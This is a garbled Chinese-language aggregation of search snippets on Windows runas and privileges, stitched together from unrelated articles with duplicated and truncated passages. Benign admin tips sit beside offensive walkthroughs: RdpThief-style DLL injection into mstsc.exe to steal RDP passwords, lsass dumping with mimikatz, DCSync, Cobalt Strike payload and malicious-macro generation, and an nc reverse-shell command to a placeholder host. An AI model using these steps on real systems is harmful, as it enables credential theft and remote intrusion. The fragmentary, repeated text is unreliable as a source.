在默认情况下,Windows 系统中启动一个进程会继承父进程的令牌。如果父进程是管理员权限,那么子进程就是管理员权限;如果父进程是标准用户权限,那么子进程也是标准用户权限。...runas 命令 runas 是 Windows 系统上自带的一个命令,通过此命令可以以指定权限级别间接启动我们的程序,而不止是继承父进程的权限。...关于如何在程序中判断当前是否以管理员权限运行,可以阅读我和林德熙的博客: dotnet 判断程序当前使用管理员运行降低权使用普通权限运行 - 林德熙 在 Windows 系统上降低 UAC 权限运行程序...\Walterlv.Demo.exe 运行发现,非管理员的 PowerShell 启动的是非管理员权限的进程;而管理员的 PowerShell 启动的是管理员权限的进程。...使用 C# 代码来降权运行 使用 C# 代码,就是要将下面这一句翻译成 C#。 1 > runas /trustlevel:0x20000 .
比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况...的参数的 /trustlevel 应该是在 /showtrustlevels 中枚举 program EXE 的命令行。...普通用户执行calc.exe. runas /user:test calc.exe # (2) 使用本机上的admin身份扫行msc控制台, /profile为指定加载用户配置文件。...# (4)显示信任级别 runas /showtrustlevels # 你的系统上有下列信任级别 0x20000 (基本用户) # (5)示例1.使用本机上的Administrator管理员身份执行...# (6) 以管理员身份运行IE浏览器 (注意保存了凭证到系统之中) # 我们将命令保存为批处理后,只要在用户电脑上运行这个批处理(第一次输入管理员密码),以后用户只要双击该文件就可会以管理员身份执行命令中所指定的程序了
比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况.../trustlevel 应该是在 /showtrustlevels 中枚举 program EXE 的命令行。...普通用户执行calc.exe. runas /user:test calc.exe # (2) 使用本机上的admin身份扫行msc控制台, /profile为指定加载用户配置文件。...Administrator管理员身份执行CMD,/noprofile为不加载该用户的配置信息 #提升CMD管理员权限 runas /noprofile /user:Administrator "cmd.exe...# (6) 以管理员身份运行IE浏览器 (注意保存了凭证到系统之中) # 我们将命令保存为批处理后,只要在用户电脑上运行这个批处理(第一次输入管理员密码),以后用户只要双击该文件就可会以管理员身份执行命令中所指定的程序了
应用场景 当我们拿到某台机器时就可以用以下几个工具来窃取管理员使用mstsc.exe远程连接其他机器时所输入的RDP用户密码等信息,其原理是将特定的恶意dll注入到mstsc.exe实现窃取RDP凭据;...RdpThief RdpThief本身是一个独立的DLL,当注入mstsc.exe进程时,将执行API挂钩、提取明文凭据并将其保存到文件中。...),但不会卸载已加载的DLL rdpthief_dump //打印提取的凭据(如果有) 这时如果管理员在这台机器上使用mstsc.exe连接另一台机器,只要输入用户、密码就能窃取到RDP凭据。...SharpHook目前仅支持mstsc、runas、powershell等进程下窃取凭据,其他的还未完成或有BUG,可以改用python写的PyHook,支持在以下进程中窃取凭据,使用frida将其依赖项注入目标进程...接着在命令终端下执行APIHookInjectorBin.exe将RDPCredsStealerDLL.dll文件注入到mstsc.exe进程中,提示DLL Injected succesfully为注入成功
进程的代理,以解决 DNS 问题,并通过 SOCKS 代理强制来自 SYSTEM 进程/内核启动的 TCP 的流量。...实现这一点的两种方法是简单地使用runas.exe 二进制文件,或者在目标用户只有 NT 哈希的情况下使用mimikatz PTH功能。...VM,它使用 Proxifier 通过 SOCKS 代理路由我们的工具流量,并结合runas.exe或 mimikatz 在适当的远程域用户上下文中执行工具。...例如,我们将: 使用 `runas` 在域用户的上下文中创建一个新进程,该域用户在目标工作站上具有本地管理员权限,可从受感染的机器路由 执行SharpWMI枚举目标工作站上的环境变量 使用Sysinternal...默认域管理员帐户及其 NT 哈希用于在必要的用户上下文中创建新进程以执行 DCSync。执行 SharpKatz 并利用 MS-DRSR 进行特定用户的 DCSync。
比如从一个普通用户,通过“手段”让自己变为管理员用户,也可以理解为利用操作系统或软件应用程序中的错误,设计缺陷或配置错误来获得对更高访问权限的行为。...2.接下来我们上传nc,此处可以换成cs或msf生成的任意可执行文件 ,此处有一个小坑,binPath=和路径中间有一个空格,修改服务启动的可执行程序后,启动服务。...服务器或网站)的任何Windows应用程序都可以使用此凭据管理器和Windows Vault并使用提供的凭据代替用户一直输入用户名和密码。...除非应用程序与凭据管理器进行交互,否则我认为它们不可能对给定资源使用凭据。因此,如果您的应用程序要使用保管库,则应以某种方式与凭证管理器进行通信,并从默认存储保管库中请求该资源的凭证。...2.使用runas来以管理员权限启动nc反弹shell Runas /user:administrator /savecred "nc.exe -e cmd.exe X.X.X.X 1337" ?
要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。...如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe: cmd /c dir > c:\test.out。...-o 显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。...注释 管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。...如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
简单的 举个例子,你需要用administrator权限启动notepad.exe,你可以写成这样: runas /user:administrator notepad.exe 在某些情况下,为了安全起见...比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况...> program RUNAS使用示例: runas /noprofile /user:mymachine\administrator cmd 说明:使用本机上的Administrator管理员身份执行...向这样,我们将命令保存为批处理后,只要在用户电脑上运行这个批处理(第一次输入管理员密码),以后用户只要双击该文件就可会以管理员身份执行命令中所指定的程序了。 ————————- 这样就完了吗?...(即封装为.exe的文件,让用户不能进行修改。) 封装操作很简单,下载一个“Bat To Exe Converter”的程序即可将.bat的文件转换为.exe的执行文件。
该程序包生成一个HTML应用,该应用运行一个CobaltSt rikepayload。你可以选择可执行的选项来获取一个HTML应用,此HTML应用使得一个可执行文件落地在磁盘上并运行它。...使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意的宏来将payload注入到内存中。...你可以使用这个可执行文件来作为使用sc命令起的Windows服务的调用程序,或使用Metasploit框架的PsExec模块生成一个自定义的可执行文件。...利用Windows ServiceEXE生成的EXE才能用来作为服务自启动的EXE,利用Cobalt Strike中Windows exe生成的EXE不能作为服 务自启动的EXE程序(因为不能响应Service...勾选Sign executable file框来使用一个代码签名的证书来签名一个EXE或DLL Ar tifact。你 必须指定一个证书,你必须在C2拓展文件中指定证书。
)就是上线端口 1.生成木马并执行 我这边直接生成了一个stageless的木马(不熟悉的话可以去看啊离上一篇文章) 生成的木马丢上去靶机执行然后等一小会(顺带一提:不知道是不是出于某种原因,cs直接生成的马...,可能是因为域的原因,即使输入了也会提权失败,但是没关系,因为已经密码记录在内存中了,我们只需要本地提权并使用mimikatz读取密码 【按照实际情况来说,其实输入本地管理员口令的更多,这里我为了演示,...补充:在CS中,可以使用powershell-import导入ps1脚本,然后使用powerpick去执行脚本的模块 图38 You can use powershell-import command...to import module 其实可以使用系统自带的Invoke-Command模块进行远程命令执行(当然,也需要调用凭据) powerpick Invoke-Command -ComputerName...(c).One-liner 配合runu在指定进程执行命令 在这里的话,是看目标进程的arch生成oneliner,我的目标进程是64位,所以生成x64和x86的payload都可以,x86进程则只能生成
在 Windows 系统中,管理员权限和非管理员权限运行的程序之间不能使用 Windows 提供的通信机制进行通信。...对于部分文件夹(ProgramData),管理员权限创建的文件是不能以非管理员权限修改和删除的。 然而,一个进程运行之后启动的子进程,会继承当前进程的 UAC 权限;于是有时我们会有降权运行的需要。...方法一:使用 runas 命令来运行程序(推荐) 使用 runas 命令来运行,可以指定一个权限级别: 1 > runas /trustlevel:0x20000 "C:\Users\walterlv\...runas 命令以指定的权限启动一个进程(非管理员、管理员) - 吕毅 方法二:使用 explorer.exe 代理运行程序 请特别注意,使用 explorer.exe 代理运行程序的时候,是不能带参数的...,使用 explorer.exe 代理运行程序的时候,是不能带参数的,否则 explorer.exe 将不会启动你的程序。
图12 Create a listener by using Beacon https payload 这里的HTTPS Port (C2)就是上线端口 1.生成木马并执行 我这边直接生成了一个stageless...,可能是因为域的原因,即使输入了也会提权失败,但是没关系,因为已经密码记录在内存中了,我们只需要本地提权并使用mimikatz读取密码 【按照实际情况来说,其实输入本地管理员口令的更多,这里我为了演示,...“ 一下子拿下系统,而是当管理员权限满足不了你的时候,可以用svc-exe进行提升(类似getsystem命令,但是getsystem不太好使) 使用例如下情况: ?...图38 You can use powershell-import command to import module 其实可以使用系统自带的Invoke-Command模块进行远程命令执行(当然,也需要调用凭据...(c).One-liner 配合runu在指定进程执行命令 在这里的话,是看目标进程的arch生成oneliner,我的目标进程是64位,所以生成x64和x86的payload都可以,x86进程则只能生成
不使用mimikatz的情况下转储lsass进程提取凭据 参考: 渗透技巧——使用Mimilib从dump文件中导出口令 Mimilib利用分析 转储lsass.exe 进程的方法如下: 使用ProcDump...目标机器上管理员权限执行,自动dump lsass 进程的转储文件。 ? lsass.dmp下载到本地使用 mimikatz 解密就好。...通过带有 /netonly的runas 凭据登录 #注,这里的用户并不是有效的用户,任意的用户即可 #尽管以用户的身份登录,但是日志中登录类型为9,表示源自新进程的任何网络连接都使用下凭据 ?...原文任然使用上面编写的CryptUnprotectData在用户上下文上执行,使用VS查看内存中的中字符,笔者前面的程序未能成功查看的字符,这里未成功复现。...开启另外一个终端,使用mimikatz以注入进程(jerry身份运行的进程),执行tsssp::client: 笔者理解的是进程注入,可能有误 "kekeo.exe \"tsssp::client /
agscript:扩展应用的脚本 c2lint:该文件主要检查profile的错误和异常 teamserver:服务端启动程序 cobaltstrike.jar:CobaltStrike... Executable:生成32位或64位的exe、dll可执行文件 5.Windows Executable(S):用于生成一个exe可执行文件,包含Beacon的完整payload,与4相比,该模块额外提供了代理功能...(3)常用命令 argue 进程参数欺骗 blockdlls 在子进程中阻止非Microsoft的DLLs文件 ...使用PowerShell在主机上生成会话 psinject 在特定进程中执行PowerShell命令 pth ...run 在目标上执行程序(返回输出) runas 以另一个用户权限执行程序 runasadmin
基础使用 # 1.此示例启动一个进程,该进程使用当前文件夹中的Sort.exe文件。...Start-Process -FilePath "sort.exe" # 2.此示例启动一个进程,该进程打印C:\PS Test\MyFile.txt文件。...文件中的项进行排序,并返回sorted.txt文件中的排序项,任何错误都会写入sorterrror.txt文件。...Start-Process -FilePath "powershell" -Verb RunAs # 6.此示例演示如何查找启动进程时可以使用的动词,可用的谓词由进程中运行的文件的文件扩展名决定。...cmdlet 执行该操作(如果存在)继续操作,并启动 Windows 时间服务,但这次使用 cmdlet 启动服务。
与 lsass.exe 一样,RDP 协议相关的进程例如 svchost.exe、mstsc.exe 等也在收集凭证的范围内,并且从这些进程中收集凭据不需要管理员特权。...这个程序对系统的正常运行是非常重要,可以承载多个服务来防止资源消耗。许多服务通过注入到该程序中启动,所以当我们查看进程列表时会有多个该文件的进程。...和 CryptProtectMemory),并检索其中的凭据然后将凭据写入主机上的某个文件中。...: •C++ 工程文件 可以编译生成 .dll,该 .dll 会被注入到 mstsc.exe 进程中。...加载成功后便有了以下三个支持的命令: •rdpthief_enable:启动心跳检测,每 5 秒搜索一次 mstsc.exe 进程并注入 RdpThief_x64.tmp 中的 Shellcode。
我们发现运行一切正常 那么如果添加RunAs 3、我们现在使用Start-Process .\2.bat -Verb runas 使用管理员方式运行脚本。 ? 我们发现运行不了了。...重新以RunAs方式执行后发现,运行路径竟然是C:WINDOWS\System32 那么自然找不到Code.exe咯 所以这是一个相对路径的问题。...同样无法开启Code.exe 结论 ##原因 Process以RunAs方式启动进程,执行目录在系统目录,一般为 C:WINDOWS\System32。...Process以普通方式启动进程,执行目录在当前运行目录,而不在目标进程所在目录。 解决方式 既然知道了问题所在,那么解决方案就很简单了。...将启动的工作目录调整到目标进程的工作目录,以非RunAs方式启动 这种方式可以解决PowerShell的问题,但是如果是在C#中使用,或者必须要求目标进程以管理员权限启动时就很尴尬了。
与 lsass.exe 一样,RDP 协议相关的进程例如 svchost.exe、mstsc.exe 等也在收集凭证的范围内,并且从这些进程中收集凭据不需要管理员特权。...然后将上图中得到的 guidMasterKey 值( {b3d8987a-42dd-4c6b-9c7f-a37d93e722b9})记录下来并执行以下命令,找到与 guidMasterKey 也就是下图执行结果中的...这个程序对系统的正常运行是非常重要,可以承载多个服务来防止资源消耗。许多服务通过注入到该程序中启动,所以当我们查看进程列表时会有多个该文件的进程。...和 CryptProtectMemory),并检索其中的凭据然后将凭据写入主机上的某个文件中。...: •C++ 工程文件 可以编译生成 .dll,该 .dll 会被注入到 mstsc.exe 进程中。
b、利用 通常情况下,tsclient 的利用思路较为简单,通过文件传输将恶意程序脚本写入用户的启动(startup)文件夹,当机器重启时,就会执行恶意程序脚本。...大概场景如下: 遍历 tsclient 的自启动目录 -》添加执行程序 -》机器重启 -》目标上线 ?...使用登录用户执行dir \\tsclient\c命令,可以正常访问。 ? 使用其他用户执行命令无法访问,包括使用 runas: ? 因此,想使用 tsclient 进行信息收集也相对困难。...a、原理 在使用 mstsc 进行远程桌面的时候,会启动一个叫 rdpclip.exe 的进程,该进程的功能是同步服务端与客户端的剪贴板。 ?...此外,由于该进程是后台运行的,当管理员同时用远程桌面登陆多个服务器,在其中的某一个服务器上进行复制拷贝操作时,会将数据同步到所有服务器的 rdplicp.exe 进程。
下图显示了所需的组件以及凭据通过系统对用户或进程进行身份验证以成功登录所采用的路径。 ? 所有系统的认证组件: 用户登录: Winlogon.exe 是负责管理安全用户交互的可执行文件。...大多数由用户启动的进程使用 Secur32.dll 在用户模式下运行,而在启动时启动的进程(例如服务)使用 Ksecdd.sys 在内核模式下运行。...凭据提供程序还旨在支持特定于应用程序的凭据收集,并可用于对网络资源进行身份验证、将计算机加入域或为用户帐户控制 (UAC) 提供管理员同意。...例如,当用户执行以下任一操作时,会创建具有存储的 LSA 凭据的 LSA 会话: 登录到计算机上的本地会话或 RDP 会话 使用RunAs选项运行任务 在计算机上运行活动的 Windows 服务...SAM 数据库作为文件存储在本地硬盘驱动器上,它是每台 Windows 计算机上本地帐户的权威凭据存储。此数据库包含该特定计算机本地的所有凭据,包括该计算机的内置本地管理员帐户和任何其他本地帐户。
领取专属 10元无门槛券
手把手带您无忧上云